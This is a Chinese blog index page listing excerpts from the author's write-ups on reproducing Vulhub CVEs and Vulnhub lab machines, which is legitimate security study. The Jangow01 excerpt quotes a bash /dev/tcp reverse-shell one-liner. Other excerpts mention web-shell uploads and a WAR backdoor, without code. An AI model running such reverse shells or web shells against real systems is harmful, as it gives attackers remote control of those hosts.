- 博客(56)
- 收藏
- 关注
RSS订阅原创 Vulhub 中的 ColdFusion CVE-2023-26360
是个挺老的漏洞了,据漂亮国警告说:黑客积极利用 Adobe ColdFusion 中的一个关键漏洞(CVE-2023-26360)来获取对政府服务器的初始访问权限。
2026-06-18 10:19:24
209
原创 Vulhub 中的 coldfusion CVE-2010-2861
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
2026-05-29 13:49:37
23
原创 Vulhub 中的 Cacti-CVE-2025-24367
Cacti是一款利用RRDTool数据存储和图形化功能的完整网络图形化解决方案。在Cacti 1.2.28及以前版本中存在一个命令注入漏洞,该漏洞允许已认证用户在Web服务器上创建任意PHP文件,从而可能导致远程代码执行。
2026-05-20 13:47:08
67
原创 Vulhub 中的 Cacti-CVE-2023-39361
在Cacti 1.2.24及更早版本中,graph_view.php文件存在一个严重的漏洞,当启用guest用户时,未经任何身份验证的攻击者通过'rfilter'参数即可执行SQL注入攻击,最终可能导致远程代码执行。
2026-05-07 09:28:13
250
原创 Vulhub 中的 Cacti CVE-2022-46169
先学习原理,Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。
2026-04-10 10:29:28
262
原创 Vulhub 中的 bash CVE-2014-6271
先学习原理,一个挺老的漏洞了。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSSH、DHCP等。
2026-04-08 09:01:33
166
原创 Vulhub 中的 appweb CVE-2018-8715
学习一下该漏洞的原理,在APP 7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功, 并返回session。
2026-04-01 09:52:07
61
原创 Vulhub 中的 apereo-cas 4.1-rce
先看原理,Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
2026-03-31 09:47:13
208
原创 Vulhub 中的 apache-druid CVE-2021-25646
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞。
2026-03-30 10:50:11
40
原创 Vulhub 中的 apache-cxf CVE-2024-28752
那么先学习漏洞原理吧,Apache CXF 是一个开源的服务框架,帮助开发者使用 JAX-WS 和 JAX-RS 等前端编程 API 构建和开发服务。
2026-03-27 15:09:13
153
原创 Vulhub 中的 aj-report CNVD-2024-15077
好的,先学习一下原理。AJ-Report是全开源的一个BI平台。在其1.4.0版本及以前,存在一处认证绕过漏洞,攻击者利用该漏洞可以绕过权限校验并执行任意代码。
2026-03-26 10:49:49
45
原创 Vulhub 中的 Airflow CVE-2020-17526
先学习原理吧,pache Airflow是一款开源的,分布式任务调度框架。默认情况下,Apache Airflow无需用户认证,但管理员也可以通过指定`webserver.authenticate=True`来开启认证。在其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。
2026-03-25 14:58:23
222
原创 Vulhub 中的 Airflow CVE-2020-11981
先学习一下该漏洞的原理,CVE-2020-11981 是一个影响 Apache Airflow 的高危漏洞。Apache Airflow 是一个开源的分布式任务调度框架。在 1.10.10 及以前的版本中,如果攻击者控制了 Celery 的消息中间件(如 Redis 或 RabbitMQ),则可以通过控制消息,在 Worker 进程中执行任意命令。
2026-03-23 15:24:39
63
原创 Vulhub 中的 Airflow CVE-2020-11978
先看漏洞原理吧,Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。
2026-03-23 11:26:20
47
原创 Vulhub 中的 adminer CVE-2021-43008
老规矩,先了解一下原理。CVE-2021-43008 是 Adminer 数据库管理工具中的一个 文件读取漏洞,影响版本为 1.12.0 至 4.6.2,该问题在 4.6.3 版本中已修复。漏洞的核心在于 MySQL 的 LOAD DATA LOCAL 功能,攻击者可以通过该功能实现远程文件读取。
2026-03-16 15:25:16
68
原创 Vulhub 中的 adminer CVE-2021-21311
先了解一下漏洞原理: CVE-2021-21311 是一个影响 Adminer 版本 4.0.0 到 4.7.9 的服务器端请求伪造(SSRF)漏洞。Adminer 是一个用 PHP 编写的数据库管理工具。此漏洞允许攻击者通过伪造服务器端请求来访问内部网络资源。
2026-03-16 15:06:44
90
原创 Vulhub 中的 CVE-2023-46604
先了解一下原理,CVE-2023-46604 是OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。
2026-03-09 10:01:39
266
原创 Vulhub中的1panel-CVE-2024-39907
漏洞原理是在1panel面板中的/api/v1/settings/search路径下存在SQL注入漏洞,主要是因为对orderBy参数缺乏适当的输入验证,导致SQL注入攻击。
2026-03-06 14:33:32
288
原创 Vulhub中的CVE-2022-41678
第一次复现完有点懵的漏洞,截止写本文的时候还在消化。先了解一下原理,Apache ActiveMQ Jolokia代码执行漏洞(CVE-2022-41678),在ActiveMQ中,经过身份验证的远程攻击者下可通过/api/jolokia/接口操作MBean,成功利用此漏洞可导致远程代码执行。
2026-03-04 15:41:27
271
原创 Vulhub中的CVE-2016-3088
实际上是这样,中间踩了不少坑,了解了一下漏洞原理,是通过PUT 包上传小马之后,利用MOVE 包将小马移动到可执行目录。所以思路是上传-移动-shell连接。
2026-03-04 10:50:24
206
原创 Vulhub中的CVE-2015-5254
该漏洞的成因是 ActiveMQ 没有对代理中可以序列化的类进行限制。远程攻击者可以通过构造一个特殊的序列化 Java 消息服务(JMS)ObjectMessage 对象,利用该漏洞执行任意代码。
2026-03-02 09:55:12
221
原创 vulhub 中的 CVE-2018-2826
本来以为能开开心心的复现漏洞,做到最后结果翻车了。最后还发现有其它惊喜,具体有多惊喜,且听笔者尾尾道来。痛定思痛之后发现竟然成功了,多尝试总是没错的。
2026-02-03 13:44:56
344
原创 Ubuntu22.04 安装Docker Vulhub遇到的问题
记录docker 与docker-compose 不兼容问题 以及 docker源不通问题。
2026-01-22 11:38:41
645
原创 Vulnhub中的ica1
和大佬一起打才发现差距,但是我不觉得亏,至少我还学到一些数据库的一些知识。然后学学新的提权方法,当然了,也走了不少弯路,至少吧,一开始以为文件上传拿shell就没成功。
2025-02-25 10:08:06
656
原创 Vulnhub中的Thales
其实这个靶机不难,做的多了也就慢慢的有了思路,新的知识也就是生成一个war文件的后门。好的,起来活动活动,继续卷大佬!
2025-02-20 12:59:26
693
原创 Vulnhub中的noob
从实战角度出发,很少真有把敏感信息和图片放在一起的,但也不是没有,所以多学习一点做个记录。万一以后真遇到了呢?安全这事儿没有银色子弹,仍然需要不断学习才能有所成长!
2025-02-14 12:22:06
756
原创 VULNHUB中的jangow01-1.0.1
经过查询资料之后发现是kali的编译版本太高了,靶机使用的版本是2.23,kali的版本为2.38。收获满满的,一开始是想用‘bash -i >& /dev/tcp/ip/port 0>&1 ’连接nc,但是反弹不出来,所以才写的一句话,结果没想到绕来绕去的还是用了蚁剑。不断思考,下载的POC没有问题,一定是编译的问题,编译改了版本仍然报错,是不是上传的文件有问题?上来就踩坑,还是用的小套路,扫描存活IP,结果扫了个寂寞,求助了大佬才知道,原来是靶机的设定网卡和运行使用的网卡不是一个。并存在site目录。
2025-01-16 15:30:45
926
原创 Vulnhub中的Earth
总的来讲,发现了新的IP(192.168.117.149),访问之后发现打不开,仔细看了nmap的扫描结果之后发现有DNS解析,所以在/etc/hosts文件中添加。运行reset_root发现运行失败,利用nc传到本地,利用strace执行reset_root后,发现需要三个文件,于是在靶机创建三个缺失的文件,再次执行reset_root。代码和答案都是正确的,我用的KALI跑出来是错的,但是不愿透露姓名的大佬表示他跑出来的是正确的。由nmap的结果可得知,IP开放了22,80,443。
2025-01-10 15:57:10
534
原创 关于考CISP-PTE的那一小点心得
说实话,当我把题全做出来之后,我并没有太强的喜悦感,也许是我紧张过头了,毕竟考试前焦虑的失眠。直到看漫画中说:武术不是为了求胜,而是为了超越自我。参加天下第一武道会不是以胜利为目的,主要是为检测自己的实力和积累经验。从考证的角度说,虽然网上有说考PTE没啥含金量的,但是对于我这样从不会到会的来说还是有一定难度的。不过确实没感觉自己的水平有特别高的提高,所以为了提升自己的技术水平,还是要努力的学习才对,目前的想法是考虑考虑OSCP。
2024-04-29 19:37:36
1314
8
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人